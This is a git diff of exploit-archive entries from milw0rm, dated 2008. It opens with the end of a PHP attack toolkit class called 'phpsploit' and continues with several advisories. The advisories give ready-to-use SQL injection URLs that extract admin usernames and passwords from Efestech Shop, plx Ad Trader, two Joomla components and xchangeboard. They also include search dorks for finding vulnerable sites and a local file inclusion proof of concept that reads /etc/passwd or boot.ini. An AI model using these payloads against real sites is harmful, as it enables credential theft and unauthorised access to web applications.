+			$hsize = substr($data, $offset, $hsize_size);
+			$dsize = hexdec($hsize);
+			
+			/*
+			print "offset (dec) = $offset\n";
+			print "hsize  (hex) = $hsize\n";
+			print "dsize  (dec) = $dsize\n";
+			print "crlfp  (dec) = $hsize_size\n";
+			print "--\n";
+			*/
+			
+			# Remove $hsize\r\n from $data
+			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
+			
+			$offset += $dsize;
+			
+			# Remove the \r\n before the next $hsize
+			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
+		}
+		
+		return $data;
+	}
+}
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 4 / PHP 5
+ * VERSION:        2.0
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2007-06-10] (2.0)
+ *  * Code: Code optimization
+ *  * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit
+{
+	var $proxyhost;
+	var $proxyport;
+	var $host;
+	var $path;
+	var $port;
+	var $method;
+	var $url;
+	var $packet;
+	var $proxyuser;
+	var $proxypass;
+	var $header;
+	var $cookie;
+	var $data;
+	var $boundary;
+	var $allowredirection;
+	var $last_redirection;
+	var $cookiejar;
+	var $recv;
+	var $cookie_str;
+	var $header_str;
+	var $server_content;
+	var $server_header;
+	
+
+	/**
+	 * This function is called by the
+	 * get()/post()/formdata() functions.
+	 * You don't have to call it, this is
+	 * the main function.
+	 *
+	 * @access private
+	 * @return string $this->recv ServerResponse
+	 * 
+	 */
+	function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport))
+		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
+		else
+		   $socket = @fsockopen($this->host,$this->port);
+		
+		if(!$socket)
+		   die("Error: Host seems down");
+		
+		# modification (by real)
+		preg_match("#^http://[^/]+(/.*)$#i", $this->url, $tmp);
+		$tmp = $tmp[1];
+		
+		if($this->method=='get')
+		   $this->packet = 'GET '.$tmp." HTTP/1.1\r\n";
+		   
+		elseif($this->method=='post' or $this->method=='formdata')
+		   $this->packet = 'POST '.$tmp." HTTP/1.1\r\n";
+		   
+		else
+		   die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser))
+		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+		
+		if(!empty($this->header))
+		   $this->packet .= $this->showheader();
+		   
+		if(!empty($this->cookie))
+		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+	
+		$this->packet .= 'Host: '.$this->host."\r\n";
+		$this->packet .= "Connection: Close\r\n";
+		
+		if($this->method=='post')
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method=='formdata')
+		{
+			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+
+		$this->packet .= "\r\n";
+		$this->recv = '';
+
+		fputs($socket,$this->packet);
+
+		while(!feof($socket))
+		   $this->recv .= fgets($socket);
+
+		fclose($socket);
+
+		if($this->cookiejar)
+		   $this->getcookie();
+
+		if($this->allowredirection)
+		   return $this->getredirection();
+		else
+		   return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several
+	 * cookies in the request.
+	 * 
+	 * @access  public
+	 * @param   string cookn CookieName
+	 * @param   string cookv CookieValue
+	 * @example $this->addcookie('name','value')
+	 * 
+	 */
+	function addcookie($cookn,$cookv)
+	{
+		if(!isset($this->cookie))
+		   $this->cookie = array();
+
+		$this->cookie[$cookn] = $cookv;
+	}
+
+
+	/**
+	 * This function allows you to add several
+	 * headers in the request.
+	 *
+	 * @access  public
+	 * @param   string headern HeaderName
+	 * @param   string headervalue Headervalue
+	 * @example $this->addheader('Client-IP', '128.5.2.3')
+	 * 
+	 */
+	function addheader($headern,$headervalue)
+	{
+		if(!isset($this->header))
+		   $this->header = array();
+		   
+		$this->header[$headern] = $headervalue;
+	}
+
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server. Several methods
+	 * are supported.
+	 * 
+	 * @access  public
+	 * @param   string proxy ProxyHost
+	 * @param   integer proxyp ProxyPort
+	 * @example $this->proxy('localhost',8118)
+	 * @example $this->proxy('localhost:8118')
+	 * 
+	 */
+	function proxy($proxy,$proxyp='')
+	{
+		if(empty($proxyp))
+		{
+			$proxarr = explode(':',$proxy);
+			$this->proxyhost = $proxarr[0];
+			$this->proxyport = (int)$proxarr[1];
+		}
+		else 
+		{
+			$this->proxyhost = $proxy;
+			$this->proxyport = (int)$proxyp;
+		}
+
+		if($this->proxyport > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server which requires a
+	 * basic authentification. Several
+	 * methods are supported:
+	 *
+	 * @access  public
+	 * @param   string proxyauth ProxyUser
+	 * @param   string proxypass ProxyPass
+	 * @example $this->proxyauth('user','pwd')
+	 * @example $this->proxyauth('user:pwd');
+	 * 
+	 */
+	function proxyauth($proxyauth,$proxypass='')
+	{
+		if(empty($proxypass))
+		{
+			$posvirg = strpos($proxyauth,':');
+			$this->proxyuser = substr($proxyauth,0,$posvirg);
+			$this->proxypass = substr($proxyauth,$posvirg+1);
+		}
+		else
+		{
+			$this->proxyuser = $proxyauth;
+			$this->proxypass = $proxypass;
+		}
+	}
+
+
+	/**
+	 * This function allows you to set
+	 * the 'User-Agent' header.
+	 * 
+	 * @access  public
+	 * @param   string useragent Agent
+	 * @example $this->agent('Firefox')
+	 * 
+	 */
+	function agent($useragent)
+	{
+		$this->addheader('User-Agent',$useragent);
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->header_str Headers
+	 * @example $this->showheader()
+	 * 
+	 */
+	function showheader()
+	{
+		$this->header_str = '';
+		
+		if(!isset($this->header))
+		   return;
+		   
+		foreach($this->header as $name => $value)
+		   $this->header_str .= $name.': '.$value."\r\n";
+		   
+		return $this->header_str;
+	}
+
+	
+	/**
+	 * This function returns the cookies
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->cookie_str Cookies
+	 * @example $this->showcookie()
+	 * 
+	 */
+	function showcookie()
+	{
+		$this->cookie_str = '';
+		
+		if(!isset($this->cookie))
+		   return;
+		
+		foreach($this->cookie as $name => $value)
+		   $this->cookie_str .= $name.'='.$value.'; ';
+
+		return $this->cookie_str;
+	}
+
+
+	/**
+	 * This function returns the last
+	 * formed http request.
+	 * 
+	 * @access  public
+	 * @return  string $this->packet HttpPacket
+	 * @example $this->showlastrequest()
+	 * 
+	 */
+	function showlastrequest()
+	{
+		if(!isset($this->packet))
+		   return;
+		else
+		   return $this->packet;
+	}
+
+
+	/**
+	 * This function sends the formed
+	 * http packet with the GET method.
+	 * 
+	 * @access  public
+	 * @param   string url Url
+	 * @return  string $this->sock()
+	 * @example $this->get('localhost/index.php?var=x')
+	 * @example $this->get('http://localhost:88/tst.php')
+	 * 
+	 */
+	function get($url)
+	{
+		$this->target($url);
+		$this->method = 'get';
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed
+	 * http packet with the POST method.
+	 *
+	 * @access  public
+	 * @param   string url  Url
+	 * @param   string data PostData
+	 * @return  string $this->sock()
+	 * @example $this->post('http://localhost/','helo=x')
+	 * 
+	 */	
+	function post($url,$data)
+	{
+		$this->target($url);
+		$this->method = 'post';
+		$this->data = $data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http
+	 * packet with the POST method using
+	 * the multipart/form-data enctype.
+	 * 
+	 * @access  public
+	 * @param   array array FormDataArray
+	 * @return  string $this->sock()
+	 * @example $formdata = array(
+	 *                      frmdt_url => 'http://localhost/upload.php',
+	 *                      frmdt_boundary => '123456', # Optional
+	 *                      'var' => 'example',
+	 *                      'file' => array(
+	 *                                frmdt_type => 'image/gif',  # Optional
+	 *                                frmdt_transfert => 'binary' # Optional
+	 *                                frmdt_filename => 'hello.php,
+	 *                                frmdt_content => ''));
+	 *          $this->formdata($formdata);
+	 * 
+	 */
+	function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method = 'formdata';
+		$this->data = '';
+		
+		if(!isset($array[frmdt_boundary]))
+		   $this->boundary = 'phpsploit';
+		else
+		   $this->boundary = $array[frmdt_boundary];
+
+		foreach($array as $key => $value)
+		{
+			if(!preg_match('#^frmdt_(boundary|url)#',$key))
+			{
+				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
+				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+				
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+					if(isset($array[$key][frmdt_type]))
+					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+					if(isset($array[$key][frmdt_transfert]))
+					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+
+		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content
+	 * of the server response, without
+	 * the headers.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_content
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->get('http://localhost/'))
+	 * 
+	 */
+	function getcontent($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_content = '';
+		
+		for($i=1;$iserver_content .= $code[$i];
+
+		return $this->server_content;
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * of the server response, without
+	 * the content.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_header
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
+	 * 
+	 */
+	function getheader($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_header = $code[0];
+		
+		return $this->server_header;
+	}
+
+	
+	/**
+	 * This function is called by the
+	 * cookiejar() function. It adds the
+	 * value of the "Set-Cookie" header
+	 * in the "Cookie" header for the
+	 * next request. You don't have to
+	 * call it.
+	 * 
+	 * @access private
+	 * @param  string code ServerResponse
+	 * 
+	 */
+	function getcookie()
+	{
+		foreach(explode("\r\n",$this->getheader()) as $header)
+		{
+			if(preg_match('/set-cookie/i',$header))
+			{
+				$fequal = strpos($header,'=');
+				$fvirgu = strpos($header,';');
+				
+				// 12=strlen('set-cookie: ')
+				$cname  = substr($header,12,$fequal-12);
+				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
+				
+				$this->cookie[trim($cname)] = trim($cvalu);
+			}
+		}
+	}
+
+
+	/**
+	 * This function is called by the
+	 * get()/post() functions. You
+	 * don't have to call it.
+	 *
+	 * @access  private
+	 * @param   string urltarg Url
+	 * @example $this->target('http://localhost/')
+	 * 
+	 */
+	function target($urltarg)
+	{
+		if(!ereg('^http://',$urltarg))
+		   $urltarg = 'http://'.$urltarg;
+		   
+		$urlarr     = parse_url($urltarg);
+		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
+		
+		if(isset($urlarr['query']))
+		   $this->url .= '?'.$urlarr['query'];
+		
+		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+		$this->host = $urlarr['host'];
+		
+		if($this->port != '80')
+		   $this->host .= ':'.$this->port;
+
+		if(!isset($urlarr['path']) or empty($urlarr['path']))
+		   die("Error: No path precised");
+
+		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+
+		if($this->port > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function,
+	 * the script will extract all
+	 * 'Set-Cookie' headers values
+	 * and it will automatically add
+	 * them into the 'Cookie' header
+	 * for all next requests.
+	 *
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->cookiejar(0)
+	 * @example $this->cookiejar(1)
+	 * 
+	 */
+	function cookiejar($code)
+	{
+		if($code=='0')
+		   $this->cookiejar=FALSE;
+
+		elseif($code=='1')
+		   $this->cookiejar=TRUE;
+	}
+
+
+	/**
+	 * If you call this function,
+	 * the script will follow all
+	 * redirections sent by the server.
+	 * 
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->allowredirection(0)
+	 * @example $this->allowredirection(1)
+	 * 
+	 */
+	function allowredirection($code)
+	{
+		if($code=='0')
+		   $this->allowredirection=FALSE;
+		   
+		elseif($code=='1')
+		   $this->allowredirection=TRUE;
+	}
+
+	
+	/**
+	 * This function is called if
+	 * allowredirection() is enabled.
+	 * You don't have to call it.
+	 *
+	 * @access private
+	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+	 * @return string $this->get($this->last_redirection)
+	 * @return string $this->recv;
+	 * 
+	 */
+	function getredirection()
+	{
+		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+		{
+			$this->last_redirection = trim($codearr[2]);
+			
+			if(!ereg('://',$this->last_redirection))
+			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+			else
+			   return $this->get($this->last_redirection);
+		}
+		else
+		   return $this->recv;
+	}
+
+
+	/**
+	 * This function allows you
+	 * to reset some parameters.
+	 * 
+	 * @access  public
+	 * @param   string func Param
+	 * @example $this->reset('header')
+	 * @example $this->reset('cookie')
+	 * @example $this->reset()
+	 * 
+	 */
+	function reset($func='')
+	{
+		switch($func)
+		{
+			case 'header':
+			$this->header = array();
+			break;
+				
+			case 'cookie':
+			$this->cookie = array();
+			break;
+				
+			default:
+			$this->cookiejar = '';
+			$this->header = array();
+			$this->cookie = array();
+			$this->allowredirection = '';
+			break;
+		}
+	}
+}
+
+?>
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5987.txt b/platforms/php/webapps/5987.txt
index c153119af..d4d9bc524 100755
--- a/platforms/php/webapps/5987.txt
+++ b/platforms/php/webapps/5987.txt
@@ -1,48 +1,48 @@
-Title: Efestech Shop v2.0 Sql Ä°njection Vuln
-
-==============================
-==================================
-
-[+] Author : Dr.Kacak
-[+] Special Thankz : KnockOut And All My Friends
-[+] System 0VerfL0WerZ Group & BuqX Team
-[+] Mail : BuqX [at] Hotmail [dot] com
-
-=================================================================
-
-Script : Efestech Shop v2.0
-Verz: 2.0
-Download : http://www.aspindir.com/indir/5479
-
- 
-
-SQL attack ;
-
-http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
-
-Tables;
-
-ayarlar
-cat_eng
-cat_tr
-eng
-lisans
-mark_eng
-mark_tr
-product
-subcat_eng
-subcat_tr
-tr
-urun_resim
-
- 
-
-###############################################################
-
-Example Bug Site :
-
-http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
-http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng
-http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr
-
-# milw0rm.com [2008-07-01]
+Title: Efestech Shop v2.0 Sql Ä°njection Vuln
+
+==============================
+==================================
+
+[+] Author : Dr.Kacak
+[+] Special Thankz : KnockOut And All My Friends
+[+] System 0VerfL0WerZ Group & BuqX Team
+[+] Mail : BuqX [at] Hotmail [dot] com
+
+=================================================================
+
+Script : Efestech Shop v2.0
+Verz: 2.0
+Download : http://www.aspindir.com/indir/5479
+
+ 
+
+SQL attack ;
+
+http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
+
+Tables;
+
+ayarlar
+cat_eng
+cat_tr
+eng
+lisans
+mark_eng
+mark_tr
+product
+subcat_eng
+subcat_tr
+tr
+urun_resim
+
+ 
+
+###############################################################
+
+Example Bug Site :
+
+http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
+http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng
+http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5988.txt b/platforms/php/webapps/5988.txt
index 8a74bd154..aa409083a 100755
--- a/platforms/php/webapps/5988.txt
+++ b/platforms/php/webapps/5988.txt
@@ -1,53 +1,53 @@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@
-@     plx Ad Trader v3.2  SQL Injection Vulnerability
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@    Author: Hussin X                                   @
-@                                                       @
-@    Home :  www.tryag.cc/cc                            @
-@                                                       @
-@    email:  darkangel_g85[at]Yahoo[DoT]com             @
-@            hussin.x[at]hotmail[DoT]com                @
-@                                                       @
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    
-@
-@    HomE script : http://plxwebdev.com
-@
-@    DeMo        : http://plxwebdev.com/demos/plxadtrader                              
-@                                                      
-@                                                      
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@
-@
-@
-@
-
-ExPloiT :
-
-www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- 
-
-
-
-L!VE DEMO :
-
-USER
-
-http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
-
-PASSWORD
-
-http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
-
-
-@
-@
-@
-@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
-@                                                       @
-@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR       @
-@                                                       @
-@          str0ke / FAHD  /Iraqihack / Silic0n          @
-@@@@@@@@@@@@@@@@@                       @@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@
-
-# milw0rm.com [2008-07-01]
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@     plx Ad Trader v3.2  SQL Injection Vulnerability
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@    Author: Hussin X                                   @
+@                                                       @
+@    Home :  www.tryag.cc/cc                            @
+@                                                       @
+@    email:  darkangel_g85[at]Yahoo[DoT]com             @
+@            hussin.x[at]hotmail[DoT]com                @
+@                                                       @
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    
+@
+@    HomE script : http://plxwebdev.com
+@
+@    DeMo        : http://plxwebdev.com/demos/plxadtrader                              
+@                                                      
+@                                                      
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@
+@
+@
+
+ExPloiT :
+
+www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- 
+
+
+
+L!VE DEMO :
+
+USER
+
+http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
+
+PASSWORD
+
+http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
+
+
+@
+@
+@
+@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
+@                                                       @
+@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR       @
+@                                                       @
+@          str0ke / FAHD  /Iraqihack / Silic0n          @
+@@@@@@@@@@@@@@@@@                       @@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5989.txt b/platforms/php/webapps/5989.txt
index 7d534c47b..b25547d00 100755
--- a/platforms/php/webapps/5989.txt
+++ b/platforms/php/webapps/5989.txt
@@ -1,49 +1,49 @@
-[+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability
-
-[+] Team           : DarkMatter Crew
-
-[+] Crew website       : WwW.SykoPainKilla.CoM
-
-[+] Author         : SpK & His0k4
-
-[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com
-
-[+] D0rk      : inurl:index.php?option=com_versioning
-
-
-
-[+] Expl0iT :
-
-http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--
-
-
-#
-#
-#
-#
-############################################
-                                           #
-Visit our website www.sykopainkilla.com    #
-                                           #
-                                           #
-#DarmMatter & SpK F0R3V3R                  #
-                                           #
-############################################
-#
-#
-#
-#
-
-
-side note:
-versioning
-11.14.2006
-Thomas Papin
-
-This component is released under the GNU/GPL License.
-
-thomas.papin@free.fr
-www.joomprod.com
-1.0.2
-
-# milw0rm.com [2008-07-01]
+[+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability
+
+[+] Team           : DarkMatter Crew
+
+[+] Crew website       : WwW.SykoPainKilla.CoM
+
+[+] Author         : SpK & His0k4
+
+[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com
+
+[+] D0rk      : inurl:index.php?option=com_versioning
+
+
+
+[+] Expl0iT :
+
+http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--
+
+
+#
+#
+#
+#
+############################################
+                                           #
+Visit our website www.sykopainkilla.com    #
+                                           #
+                                           #
+#DarmMatter & SpK F0R3V3R                  #
+                                           #
+############################################
+#
+#
+#
+#
+
+
+side note:
+versioning
+11.14.2006
+Thomas Papin
+
+This component is released under the GNU/GPL License.
+
+thomas.papin@free.fr
+www.joomprod.com
+1.0.2
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5990.txt b/platforms/php/webapps/5990.txt
index 8d9e43755..8dd68a880 100755
--- a/platforms/php/webapps/5990.txt
+++ b/platforms/php/webapps/5990.txt
@@ -1,20 +1,20 @@
-               H-T Team { HouSSamix & ToXiC350 }
-=====================================================================
-     Joomla Component mygallery Remote SQL Injection Exploit
-=====================================================================
-
-## AUTHOR :  HouSSamix From H-T TeaM
-
-## Script :  mygallery Joomla Component ( version unknown )
-
-## DorKs :  inurl:index.php?option=com_mygallery "cid"
-			
-## EXPLOIT :
-
-index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
-
-## Note : the number of columns can be diffrent .
-
-## GREETZ  :  CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers
-
-# milw0rm.com [2008-07-01]
+               H-T Team { HouSSamix & ToXiC350 }
+=====================================================================
+     Joomla Component mygallery Remote SQL Injection Exploit
+=====================================================================
+
+## AUTHOR :  HouSSamix From H-T TeaM
+
+## Script :  mygallery Joomla Component ( version unknown )
+
+## DorKs :  inurl:index.php?option=com_mygallery "cid"
+			
+## EXPLOIT :
+
+index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
+
+## Note : the number of columns can be diffrent .
+
+## GREETZ  :  CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5991.txt b/platforms/php/webapps/5991.txt
index 5f9f1062c..c08015a58 100755
--- a/platforms/php/webapps/5991.txt
+++ b/platforms/php/webapps/5991.txt
@@ -1,33 +1,33 @@
-######################
- #
- # xchangeboard 1.70 final and lower
- #
- #
- ######################
- #
- #Bug by: haZl0oh #
- #Dork: "Powered by xchangeboard"
- #info:you have to be an registered user to use it like this !!!!
- #there should be a lot more vulns there ;)
- #
- #
- #
- # credentials like passwords are saved as cookies .... :D
- ##
- ###
- ##
- #
- #PoC:
- #http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
- #
- # #
- #
- #
- #######################
- #
- #Greetz to h0yt3r ,everiZzel & Mastermaefju
- #
- #######################
-#######################
-
-# milw0rm.com [2008-07-02]
+######################
+ #
+ # xchangeboard 1.70 final and lower
+ #
+ #
+ ######################
+ #
+ #Bug by: haZl0oh #
+ #Dork: "Powered by xchangeboard"
+ #info:you have to be an registered user to use it like this !!!!
+ #there should be a lot more vulns there ;)
+ #
+ #
+ #
+ # credentials like passwords are saved as cookies .... :D
+ ##
+ ###
+ ##
+ #
+ #PoC:
+ #http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
+ #
+ # #
+ #
+ #
+ #######################
+ #
+ #Greetz to h0yt3r ,everiZzel & Mastermaefju
+ #
+ #######################
+#######################
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5992.txt b/platforms/php/webapps/5992.txt
index 96f8b4045..1cc78673e 100755
--- a/platforms/php/webapps/5992.txt
+++ b/platforms/php/webapps/5992.txt
@@ -1,66 +1,66 @@
-======================================================================
-  CMS little (index.php template) Local File Inclusion Vulnerability
-======================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 2 July 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : CMS little
- VERSION     : 0.0.1
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip
-#####################################################
-
---- Local File Inclusion ---
-
------------------------------
- Vulnerable File (index.php)
------------------------------
-
-@Line 
-   64:  include $currentpage[template];
-   65:  } else {
-   66:	include $template.".tmpl.php";
-
----------
- Exploit
----------
-
-[+] http://[Target]/[cmslite_path]/index.php?template=[LFI]
-
-
-------
- POC
-------
-
-[+] http://[Target]/[cmslite_path]/index.php?template=../../../../../../../../boot.ini%00
-
-
-    This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
-    You can change boot.ini to /etc/passwd%00 in linux OS.
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-07-02]
+======================================================================
